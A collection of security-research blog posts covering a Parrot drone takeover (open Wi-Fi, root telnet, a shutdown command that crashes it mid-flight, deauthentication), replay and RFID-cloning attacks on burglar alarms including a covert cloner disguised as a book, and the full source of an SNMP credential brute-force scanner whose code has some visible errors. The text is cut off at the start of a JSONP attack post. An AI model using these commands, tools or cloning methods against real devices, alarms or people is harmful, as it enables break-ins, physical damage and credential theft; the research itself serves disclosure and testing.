How Secure is Your Drone – An InteliSecure Skunk Works Post

Drones have become ubiquitous over the past few years. Many organizations are now using them to help with things such as search and rescue, geographic mapping, storm tracking and more. You can see and hear them flying around your neighbourhood, at sporting events, parks, etc. And if they happen to be hovering over your private property, you have probably, at some point, wished you could just shoot it out of the sky. While that sounds like fun, you probably also live somewhere where that isn’t allowed.

Drones do pose threats though, especially around airports where a collision with an aircraft could cause significant harm and loss of life.

AR Drone

On a personal level, I just wanted to get in on the fun, not only to have my own drone, but dig into the inner workings from a technological perspective. So, I went out and bought a Parrot AR drone to see what I could find.

One of the first things I noticed was the lack of security to access and control my new toy!  Basically, the drone hosts its own 2.4GHz Wi-Fi hotspot of sorts, with zero to hero authentication.  Now there are a few applications which can be installed on your iPad, iPhone, PC and Android which give a nice user interaction to control and fly drones, but I asked myself what else Could be accessed and decided to find out!

To begin, I used the ‘Aircrack-ng’ suite and leveraged ‘Airodump-ng’ to identify the AR drone extended service set identifier (ESSID):


wireless_convict@kali:~$ sudo airodump-ng -c 1 –bssid 90:03:xx:xx:xx:xx mon0
CH  1 ][ Elapsed: 4 s ][ 2015-12-20 22:54
BSSID      PWR RXQ  Beacons #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
90:03:xx:xx:xx:xx -49  64  2719    3   1  54e. OPN   ardrone2_1031XX                    


That allowed me to see that the AR Drone was broadcasting on channel 1 with the ESSID of ardrone2_1031XX.  Knowing that, I then associated the drone with my attacking laptop…and with no authentication needed:


wireless_convict@kali:~$ sudo iwconfig wlan0
wlan0     IEEE 802.11abg  ESSID:
ardrone2_1031XX

Mode:Managed  Frequency:2.412 GHz  Access Point: 90:03:xx:xx:xx:xx
Bit Rate=54 Mb/s   Tx-Power=15 dBm
Retry short limit:7   RTS thr:off   Fragment thr:off
Encryption key:off***************** snipped *****************


At this point, I have been given an IP address from the DHCP pool. Our IP is 192.168.1.2 and we also learn at this point that the drone is on 192.168.1.1 by conducting a layer 2 Arp scan.


wireless_convict@kali:~$ sudo ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:1b:xx:xx:xx:xx
inet addr:192.168.1.2  Bcast:192.168.1.255  Mask:255.255.255.0
wireless_convict@kali:~$ sudo arp-scan -l -I wlan0
Interface: wlan0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/)
192.168.1.1     90:03:xx:xx:xx:xx    PARROT


I then decided to see what services / protocols were running on the AR Drone.  We can do this by running an Nmap scan over the IP address.

By conducting a full TCP port scan 0-65535 ports we can see some interesting open ports, especially the ‘clear-text’ FTP and Telnet, take notice of the FTP anonymous login and bounce!


uid=0(root) gid=0(root)


We learn here that it’s a stripped down Linux box, but hey we have ‘Root’! All of this information in nice, but what could I do with it?

With the information made available to me, the next thing I tried was to kill the drone in mid-flight!  I ran the simulation as if someone else were flying the drone with me taking control of it and then disabling it, sending it to ground. To do so, I associated my iPhone running the ‘AR.FreeFlight’ app,  flew the drone approximately 3 feet above the ground, associated my attacking laptop, and then, connecting to TCP port 23 via netcat, issued the ‘poweroff’ command. In less than a second, the drone’s blades stopped abruptly and it crashed into the ground!


wireless_convict@kali:~$ nc 192.168.1.1 23
BusyBox v1.14.0 () built-in shell (ash)
Enter ‘help’ for a list of built-in commands.
# poweroff
Poweroff


One other thing that is possible is to de-authenticate the current user and take control of the drone yourself!  This can be done with ‘Aireplay-ng’ and sending de-authenticating management frames! Lots of fun!


wireless_convict@kali:~$ sudo aireplay-ng -0 5 [Parrot MAC] [client MAC]


This command forces the client and drone to disconnect, allowing you to associate and take total ownership!

So in conclusion, if you see an AR drone flying around, you can be certain:

  • It sports an open auth Wi-Fi network;
  • You can access it via Telnet on port 23;
  • You can really confuse a drone’s owner off by issuing a stand-off attack sending it diving into the ground!

For better security the drone needs authentication and encryption. I will be looking into a WPA-supplicant and further protection of the drone with some kind of management authentication!

While the above exercise was done for fun, it did expose some serious flaws in personal drone security which could be exploited.

If anyone is interested in me covering some ‘Aircrack-ng’ blogs, drop me a line!

The Differences Between Audits, Security Assessments and Penetration Tests

We live and work in a world where malicious activity and cyber crime run rampant.  While online fraud and data theft have existed since the origin of the internet, never before has it seemed to be as pervasive as it is today.  Every day there seems to be a new headline about ‘XYZ Company’ coming under attack or having a massive data breach occur.  On top of that, in the United States, cyber crime has reached new heights in our consciousness given the current political climate and questions about interference with the last election. 

Needless to say, public awareness around information security is here to stay and businesses are, mostly, on high alert.  With that in mind, it seemed fitting to put some thoughts together about what this all means and discuss some of the things that are being done by businesses and other organizations to proactively bolster themselves against emerging threats.  Specifically, the aim of this post is to shed some light on security assessments and penetration testing.  One of the absolute best ways to measure one’s security posture against threats and attacks is to conduct testing that emulates those threats and attacks in a real-world, yet safe and controlled, manner.

Therein lies the problem, however, as there is a great deal of confusion and misrepresentation in the market around security assessments and penetration tests.  Misused and/or misinterpreted terminology is a common pitfall that I frequently encounter when addressing these topics with clients, prospects, partners, and other folks in this shared space.

The importance and value of conducting penetration tests as a part of an organization’s regular business process seems to now be well understood and accepted as a best practice, contrary to as recently as a few years ago.  This is great news, but the problem that still exists is that many, if not most, still do not clearly understand what it is that they’re asking for when they say something as seemingly straightforward as “I want a penetration test”.  Traditionally, there are three stages that constitute a penetration test: scanningassessing and penetrating.

Why Audits Are Not Penetration Tests

One of the biggest misconceptions is that conducting regular ‘audits’ as a part of a certification process is the same as having a security assessment performed.  Simply put, that is false.  An audit is not a penetration test.  Rather, an audit is a check-box activity that is designed to go through a list of regulatory items tied to compliance to ensure that ‘things’ are in place, be it technology, internal processes, organizational structures, etc.  Audits may not even include any stages of a penetration test.

The problem with that is that while audits can help organizations identify certain gaps in those areas, it does not properly test the effectiveness of those components.  Checking a box that says you have a firewall is not the same as testing to make sure that said firewall has been removed from its package, been properly configured, and updated with patches and other relevant changes that need to be made on an ongoing basis.

Compliance certainly has its place within the framework of a strong organizational security posture, however, compliance alone is not enough.  The whole focus of security assessments and penetration tests is to demonstrate what the real “bad guys” out there could do to any given organization if a motivated and skilled attacker were to spend time on a dedicated effort to compromise their target.

To borrow the cliché of thinking inside or outside the box, an audit mentality is absolutely akin to thinking inside the box and following a predetermined set of rules and guidelines for protection.  Passing an audit and becoming compliant should only be seen as a starting point though because the global community of malicious actors, hacktivists and state-sponsored cyber criminals are very well aware of those predetermined guidelines.  As such, they know how to think outside the box and work around those guidelines to get to what they want.  Many high profile businesses that have had their names in the headlines over the past few years passed their respective audits and were compliant with all of their requisite certifications.

Penetration Tests are Not Commodities

In addition to confusing a proper security assessment engagement with an audit, there seems to be another common misconception in that penetration testing has become a commodity.  While I agree that some aspects of the process are reliant on somewhat commoditized technology, I disagree strongly with the notion that all penetration tests are created equally.

If the idea is to emulate a real world attack to gauge the strength of an organization’s security, then it logically follows that the skill sets of the testers providing those professional services to their clients will serve as the differentiators of value and effectiveness.  I like to make the comparison of professional penetration testers to healthcare providers and physicians.

When selecting a doctor to perform a surgery, most individuals will go through an exhaustive evaluation process to make sure that the skill sets and qualifications of that doctor match with what needs to be done.  I would assume that many people put significantly more time and effort into that sort of a decision than they would in purchasing a hammer or a wrench.

It may be an oversimplification, but the idea is that when dealing with something as important as one’s health, people want to make sure that they’re getting the proper care based on the skillsets and expertise of the individuals performing the task at hand.  Whereas a hammer, for example, simply needs to strike a nail hard enough to send it into or through its target.  The idea that not all doctors are created equally mirrors my thoughts that not all penetration testers are equal.  It is important to keep that in mind when evaluating your options.

What Constitutes a Penetration Test

To go deeper into that idea, I’ll spend a little time discussing the process that goes into a proper penetration test.  This seems to be an area where a lot of confusion originates.  As previously mentioned, there are three stages that go into a traditional penetration test; scanningassessing, and exploitation.

Scanning is a process that leverages automated scanning tools to conduct a preliminary evaluation of an organization’s perimeter.  I liken this to tying your shoes before you go for a run.  It is a necessary step in the process but it alone is not sufficient for running a race – you’ll still need to manually put one foot in front of the other to cover the distance.  Scanning is useful in that it can quickly identify potential vulnerabilities that exist within a network, however there is still room for false positives and other incorrect readings.

The second stage of a traditional penetration test is an assessment.  During the assessment stage, a tester will review the preliminary findings of an automated scan and manually validate those findings by trying to compromise the targets that were initially identified as being potentially vulnerable.  In doing this, the singular goal is to determine that there is an issue that could be exploited for that given target but go no further.  This would be like trying to pick a lock to prove that a ‘secure’ door could be opened, but going no further after successfully picking the lock.

Last, but certainly not least, is the exploitation stage.  This portion of a penetration test carries the most value in that it is when an organization can quantify the risk and potential damage that could be t committed by having an identified vulnerability exploited by a malicious individual or group.  During this stage, testers will essentially demonstrate, in a safe and controlled manner, how far, deep, and wide any given wormhole would go from its initial stage of compromise.

Conclusion

An unfortunate reality of our world is that there is no such thing as an infallible level of security.  If one is going to be ‘connected’ to the outside world, all individuals and organizations must operate with a certain level of risk or vulnerability.  To that end, the best starting point for identifying an acceptable level of risk is to understand the likelihood of compromise and how much effort it would take to address the targets of opportunity within any given environment.

This comes back to the original topic of what it means when someone says “I want a penetration test”.  To me, if someone is looking for a true penetration test, they will spend time evaluating the methodology of potential service providers and the skill sets of the professional testers employed by those providers.

The first thing I try to do when meeting with people regarding penetration testing is to clearly understand how they define the meaning of ‘penetration test’.  Once a common ground of understanding is reached, it becomes possible to mutually identify the task at hand and put a plan in place to adequately address the organization’s goals, needs and desired outcomes.

An ongoing practice of proactive security measures is the only way to give oneself a chance at defending against attackers.  Too many organizations make it way too easy for attackers to take what they want.  If you are tasked with protecting your organization’s most critical assets and work in a highly regulated industry, compliance is a good starting point.  Just be sure not to stop there.  Explore your options for security assessment and penetration testing providers and make sure whomever it is you decide to work with can clearly define to you what it is they do and how they do it.

Research and Development into Commercial and Domestic Alarm Systems

As part of my Radio Frequency research, I wanted to not only look at vehicles but also household name burglar alarm systems.  To that end I decided to look at three main manufacturer types that seemed to take a large portion of the market share.

My findings concerned me, especially how some of them were trivial to bypass and disarm.  One of the alarms did come out on top, however, I did manage to defeat its ‘rolling-code’!

I will go through the results of all three systems, but will begin with the one I found most interesting due to its claims of security assurance via the rolling code system and ‘Anti-Jamming’.  The other alarms were fun and shocking, as I was able to defeat them with much more ease.  Not utilising rolling-code technology, simply capturing the static RF TX and then replaying, I was able to dis-arm the alarms at my leisure.  My research also indicated that System B seemed to be well placed in commercial environments, office and businesses while both B and C had the added feature of RFID (Radio Frequency Identification) tags to dis-arm the systems by presenting enrolled tags to the panels.  This also added another attack vector which was easily compromised.

Alarm A

The RF key fob was already paired with the first system I tested, so I pressed the arm button on the key fob.  Sure enough the box ‘bipped’ and flashed lights indicating the armed status was all good.

I fired up my trusty RTL-SDR and HackRF and started scanning whilst repeatedly arming and dis-arming the alarm system.  Clear as day, I could identify the chirps sat around the 868.275000 MHz frequency.  I set up the contact sensor and PIR unit provided with the box and confirmed that, when triggered and the alarm armed, it did indeed sound the high pitch squawks.

I then started looking at the dis-arm RF sequence.  Using the HackRF, I carefully inputted the frequency and began to record the OTA noise.  I pressed the dis-arm button once on the key fob, which dis-armed the box with a ‘blipp’.  I rearmed the system and replayed the RF chirp back to the box from the HackRF and nothing happened. I expected this because it had rolling-code. I repeated the process, arming and disarming the system via the key fob, but recording the second attempt with the HackRF.  I then rearmed and attempted to replay the second sequence. Again, nothing! I expected this!  In fact, I did not expect anything to change here, rolling-code, right? I retried the whole thing again for the third time; armed and dis-armed via the key fob and then rearmed and replayed the third captured ‘chirp’ from the HackRF with the expectation of nothing and wondering how many times I was going to do this all before getting bored and moving on to the next alarm system.

Then I heard this ‘blipp’ and the lights flashed on the box. I was shocked, wondering if there really just three possible rolling-codes before repeating them?

I set about redoing the whole experiment only to arrive at the same conclusion.  I decided to hang-on to the three chirps I had caught and set about arming and disarming, triggering, and disabling the alarm in order to hopefully expend as many codes as I could.  I re-armed the system from the key fob and started to replay my captured chirps one-by-one.  I first replayed the third chirp from the HackRF, which worked before. Nothing happened. I replayed the first chirp  again, and, nothing. I replayed the second captured from the HackRF; the box ‘blipped’ and flashed its lights.  The code had rolled, but only to one of the three that I had caught.  I tried this several times, being able to dis-arm the alarm box with 100% success by toggling through and replaying each of the three captured chirps!  I then examined the sequences from all three captures via Audacity, shown below.  I hope to provide some more information on this when I have spoken to the manufacturer.

Okay, so you ask, ‘this all good, but you need to capture all of the believed three unique rolling-codes!’  Yes I know, but that was very easy!  I started to analyse the wireless RF transmissions coming from the contact sensor and the PIR unit.  What I noticed was that the RF TX sequence was static; the same every time.  By capturing this TX with the HackRF, I would be able to send a RF TX trigger to the alarm box indicating an activation of the sensor, thus triggering the alarm.

I armed the alarm box, made sure that the sensors were not activating or sending any intruder signals to the box. I replayed the door sensor RF sequence from the HackRF and the alarm wailed away.  I repeated this several times with 100% success.

The attack vector here is simple; by having a door sensor on the front door of a building, it would be trivial to capture the RF TX that could be replayed another time.  By triggering the alarm in the dead of night, the occupant / user of the system would elect to press the dis-arm button.  Triggering the alarm three times, the owner would have dis-armed the alarm three times and if an appropriately position attacker was able to capture those dis-arm chirps, the rolling-code sequences would all be caught ready for a replay another day.

In conclusion, rolling-codes are the way to go to help prevent replay attacks, however, we normally like to see thousands if not millions of rolling-codes in any systems inventory, making the attack method I used not viable.  Having just three rolling-codes, if that is the case, just does not cut it in my opinion. We are reaching out to the manufacturer to get to the bottom of what is going on.  Just for confirmation that our alarm box was not faulty, we went out and purchased another and confirmed that our initial findings where indeed true.

Alarm B

This is a nice looking alarm system and I had some big expectations in regard to security, however, I was quite simply, very disappointed. I assembled the system and got straight to work in identifying the TX frequency for the dis-arm TX from the key fob.  I utilised that RTL-SDR and roughly focused my efforts around the 868 MHz centre frequency.  I quickly identified the frequency and commenced capturing the chirp from the key fob via the HackRF.

I wanted to confirm if the alarm system was using rolling-code, however, once I had replayed the captured dis-arm TX sequence over ten times with 100% success, it was very apparent that rolling-codes were not in use.

This system was particularly vulnerable to replay attacks, an appropriately positioned attacker would only have to capture one dis-arm TX to be able to dis-arm continually to their hearts content.

Another device that could be utilised to clone the TX sequence is one of the 433 & 868 MHz key fob cloners that are out on the market (shown to the right).  The only downside isthat you have to be within 10 cm of the original key fob TX to successfully capture the chirp.  Successful cloning of the alarm’s TX dis-arm chirp was 100% successful.

The second drawback with this alarm system was the vulnerable RFID tag dis-arming ability.  The control panel has in it an RFID reader, which reads RFID tags when they are presented to the control panel.  If the tag is enrolled on the system, it will dis-arm an armed system.

My next bit of research was to ascertain what protocols the tags were using.  I unpacked my Proxmark 3 and presented the tag to the low frequency antenna to see if I could identify the tag.  Sure enough, I was able to identify the tag as utilising the EM4100 protocol, which stores data on the tags in a read-only format with seemingly no encryption.  The attack vector here was to simply clone it.  I was able to clone the tag onto a writeable T5577-ISO RFID card.  I confirmed that the clone was good and then proceeded to test my theory against the control panel.

I armed the panel, which ‘blipped’ and went into armed mode.  I then presented the cloned card to the panel and the panel ‘blipped’ again and it was dis-armed.

The attack vector here would require the attacker to be in close vicinity to the owner of the tag.  Now, these tags are designed to fit nicely onto your bunch of keys, an obvious place to put them, but without any shielding, the tag is vulnerable to cloning.  The down side is that you have to be within 5-7 cm of the tag to energise it enough to get a clean read, but, that was a design problem I set out to fix.  I managed to source some handheld RFID cloner components and set out to build a non-conspicuous cloner. In this case, a book.  The last thing you want is someone belting you about the head because you are having to rub yourself up to them in order to get close enough to the original tag. I have included an image below of the design and camouflage I used. It looks like a diary and doesn’t look out of place whilst bumping into people on tubes, trains and a busy pedestrian areas where your target may be.  I have also considered and built a concept that fits into a standard cigarette packet, but smoking is ever becoming socially unacceptable.

In conclusion, Alarm B is a nice looking alarm system which is functional and will provide intruder detection capabilities, but it does lack security features, meaning a targeted attacker would be able to dis-arm the system in a couple ways. Some would say it is rather useless as it is so vulnerable to this sort of attack.

Alarm C

Alarm C was also a great looking system and seemed to be well made with robust construction and was easy and straight forward to set up and configure.

I experienced very similar issues with Alarm C as I did with the Alarm B, in that I could capture a single dis-arm TX and replay it over and over again to dis-arm the system;  no rolling-codes.  I identified the chirp at around 868.191000 MHz and was able to obtain a solid capture with the HackRF.

The RFID element for dis-arming and entry into the configuration mode was also easily bypassed.  It utilised the same EM4100 EM4100 and was cloned in seconds to my writable T5577-ISO RFID card.

The only thing that concerned me was that I see a lot more of these systems protecting commercial buildings while the other two seemed to be more domestically placed.  Given the vulnerabilities I identified with this alarm, I would be cautious as to what and where I would deploy them and what to protect.

In conclusion, Alarm C is a strong looking alarm system which is functional and will provide intruder detection capabilities, but again, it does lack security features, meaning a targeted attacker would be able to dis-arm the system in a couple ways, rendering it useless!

From the research conducted on the three alarm systems we conclude that there is an issue with the easy capture of the radio frequencies to disarm an alarm. We will be exploring more models, especially more like Alarm A, as the rolling-code implementation really interests us.

We are currently conducting wider research on rolling codes and how manufacturers are using this as a method to make their products more secure. Watch this space.

SNMPPLUX

InteliSecure continually develops new tools and scripts to improve the effectiveness of the team. One such tool called SNMPPLUX is an offshoot of a larger development project (ORR).
SNMPPLUX is a USM compliant SNMPv1, SNMPv2c and SNMPv3 authentication scanner powered by pysnmp, re, sys, getopt, array, time and multiprocessing python modules.
As well as providing SNMPv1 and v2c community dictionary attacks is will also provide username and password dictionary attacks for SNMPv3 for the following authentication types:
• SNMPv3 Auth None
• SNMPv3 Auth MD5 Priv None
• SNMPv3 Auth MD5 Priv DES
• SNMPv3 Auth SHA Priv AES128
• SNMPv3 Auth SHA Priv AES192
• SNMPv3 Auth SHA Priv AES256
• SNMPv3 Auth SHA Priv DES
• SNMPv3 Auth SHA Priv 3DES

Whilst multiprocessing is currently used to speed up testing with parallel processes the future plans. A library version of this code is also utilised as part of the ORR project.

Screenshot from 2016-03-30 16_03_13

Screenshot showing example operation The current source code for this tool is included below on an as is basis. It may need to be reformatted to remove syntax and indenting errors introduced by providing the source in this format. Please see the License/Disclaimer below before using this software:

The source can also be downloaded from github:

https://github.com/PenturaLabs/SNMPPLUX
-----------------------snmpplux0.3.py source--------------------------------
from pysnmp.hlapi import *
import re
import sys, getopt
from array import *
import time
from multiprocessing import Pool

def banner():
        print ('.')
        print (' /   _____/           /     \______    ______       |   |    |      /  /')
        print (' _____    /   |     /   /  |     ___/|     ___/    |   |    |   /     / ')
        print (' /        /    |    /    Y        |    |    |   |    |___|    |  / /      ')
        print ('/_______  /____|__  /____|__  /____|    |____|   |_______ ______/ /___/   ')
        print ('        /         /         /                           /              _/')
        print (' ')
        print ('Liam Romanis')
        print ('version 0.3b - beta testing')
        print ('http://www.pentura.com')
        print ('.')


def opts(argv):
    inputfile = ''
    userfile = ''
    passfile = ''
    try:
        opts, args = getopt.getopt(argv, 'i:u:p:h', ['ifile=', 'ufile=','pfile=','help'])
    except getopt.GetoptError:
        print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            print ('test.py -i <inputfile> -u <userfile> -p <passfile> ')
            sys.exit()
        elif opt in ('-i', '--ifile'):
            inputfile = arg
        elif opt in ('-u', '--ufile'):
            userfile = arg
        elif opt in ('-p', '--pfile'):
            passfile = arg

    return inputfile, userfile, passfile



def snmp1dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm, mpModel=0),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv1: %s: Community:%s" %(ip,comm))



def snmp2dict(ip, comm):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),CommunityData(comm),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('1.3.6.1.2.1.1.1.0'))))
        if errorIndication:
                pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv2: %s: Community:%s" %(ip,comm))
         


def snmp3_authNone_privNone(ip, user):
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
                pass
        elif errorStatus:
                pass
        else:
                print ("SNMPv3 Auth None Priv None: %s: %s - no pass requiredn" %(ip, user))



def snmp3_authMD5_privNone(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth MD5 Priv None: %s: %s:%s" % (ip, user, passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authMD5_privDES(ip, user, passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd),UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            sys.stdout.flush()
            print ("SNMPv3 Auth MD5 Priv DES: %s: %s:%s" % (ip,user,passwd))
    except:
        print ('exception caused by: %s:%s' % (user,passwd))
        pass

def snmp3_authSHA_privAES128(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb128Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))
        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES128: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb128Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb128Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES192(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb192Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES192: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb192Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb192Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privAES256(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmAesCfb256Protocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv AES256: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmAesCfb256Protocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmAesCfb256Protocol' % (user,passwd))
        pass


def snmp3_authSHA_privDES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usmDESPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usmDESPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usmDESPrivProtocol' % (user,passwd))
        pass

def snmp3_authSHA_priv3DES(ip,user,passwd):
    user = user.strip()
    passwd = passwd.strip()
    try:
        errorIndication, errorStatus, errorIndex, varBinds = next(getCmd(SnmpEngine(),UsmUserData(user, passwd, passwd, authProtocol=usmHMACSHAAuthProtocol, privProtocol=usm3DESEDEPrivProtocol), UdpTransportTarget((ip, 161)),ContextData(),ObjectType(ObjectIdentity('SNMPv2-MIB', 'sysDescr', 0))))

        if errorIndication:
            pass
        elif errorStatus:
            pass
        else:
            print ("SNMPv3 Auth SHA Priv 3DES: %s:%s:auth:usmHMACSHAAuthProtocol:priv:usm3DESEDEPrivProtocol" % (user,passwd))
    except:
        print ('exception caused by: %s:%s:usmHMACSHAAuthProtocol:usm3DESEDEPrivProtocol' % (user,passwd))
        pass

def snmp12_helper(args):
    return snmp1dict(*args), snmp2dict(*args)

def snmp3none_helper(args):
    return snmp3_authNone_privNone(*args)

def snmp3md5none_helper(args):
    return snmp3_authMD5_privNone(*args), snmp3_authMD5_privDES(*args)

def snmp3shaaes_helper(args):
    return snmp3_authSHA_privAES128(*args), snmp3_authSHA_privAES192(*args), snmp3_authSHA_privAES256(*args), snmp3_authSHA_privDES(*args), snmp3_authSHA_priv3DES(*args)



if __name__ == "__main__":
    banner()
    inputfile, userfile, passfile = opts(sys.argv[1:])

    with open(inputfile, "r") as ins:
            targs = []
            for line in ins:
                    line = line.replace("n", "")
                    targs.append(line)
            
    with open(userfile, "r") as ins:
            users= []
            for line in ins:
                    line = line.replace("n", "")
                    users.append(line)

    with open(passfile, "r") as ins:
        passwords = []
        for line in ins:
            if (len(line) > 8):
                line = line.replace("n", "")
                passwords.append(line)

    with open("dict.txt", "r") as ins:
        communities = []
        for line in ins:
            line = line.replace("n", "")
            communities.append(line)

    p = Pool(20)
    job1_args = [(ip, comm) for comm in communities for ip in targs]
    p.map(snmp12_helper, job1_args)
    job2_args = [(ip, user) for user in users for ip in targs]
    p.map(snmp3none_helper, job1_args)
    job3_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3md5none_helper, job3_args)
    job4_args = [(ip, user, passwd) for ip in targs for user in users for passwd in passwords]
    p.map(snmp3shaaes_helper, job4_args)

—————————————————————————–

LICENSE

Copyright ©2016 Pentura Ltd. This copyright applies to the Pentura codebase as a whole, or any individual distributed application. The individual contributions of government employees, which may be identified on a per-file basis are in the public domain. The software and content provided on this website are made available under the terms of the Apache License, Version 2.0. A copy of the License is available at:     http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an “AS IS” BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.

DISCLAIMER

THIS SOFTWARE AVAILABLE ON THE SITE http://www.pentura.com IS PROVIDED “AS IS” AND ANY EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Pentura Ltd, OR ANY OF THEIR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. Without limiting the foregoing, Pentura Ltd make no warranty that: •    the software will meet your requirements. •    the software will be uninterrupted, timely, secure or error-free. •    the results that may be obtained from the use of the software will be effective, accurate or reliable. •    the quality of the software will meet your expectations. •    any errors in the software obtained from the OpenSHA.org web site will be corrected. Software and its documentation made available on the http://www.pentura.com web site: •    could include technical or other mistakes, inaccuracies or typographical errors. Pentura contributors may make changes to the software or documentation made available on its web site. •    may be out of date and Pentura and its contributors make no commitment to update such materials. Pentura, and its contributors, assume no responsibility for errors or ommissions in the software or documentation available from the http://www.pentura.com web site. In no event shall Pentura, or it’s contributors be liable to you or any third parties for any special, punitive, incidental, indirect or consequential damages of any kind, or any damages whatsoever, including, without limitation, those resulting from loss of use, data or profits, whether or not Pentura and its contributors has been advised of the possibility of such damages, and on any theory of liability, arising out of or in connection with the use of this software. The use of the software downloaded through the http://www.pentura.com site is done at your own discretion and risk and with agreement that you will be solely responsible for any damage to your computer system or loss of data that results from such activities. No advice or information, whether oral or written, obtained by you from Pentura, its website or its contributors shall create any warranty for the software.

Exploiting Same Origin Method Execution Vulnerabilities

Recently it came to my attention that it was possible to abuse JSONP callbacks using a vulnerability known as SOME – Same Origin Method Execution which can be used by an attacker to widely abuse a user’s trust between the web application and the intended flow of execution. For example, using the SOME attack it is possible for an attacker to trick a user to visiting a malicious web-page which contains a link to the host’s web application API with a JSONP callback parameter which the attacker can then control.

An example of this would be as follows:
http://example.com/api/get_user.json?id=1&callback=logResults

The above URL could be an example of a method for a third-party to obtain user accounts associated with the user ID 1 and would return something similar to the following:
logResults({"username": "admin", "email_address":"test@example.com"});

However, using the SOME attack it is possible to change the callback function to be anything that Javascript or the API recognises. An example of which could be the following:
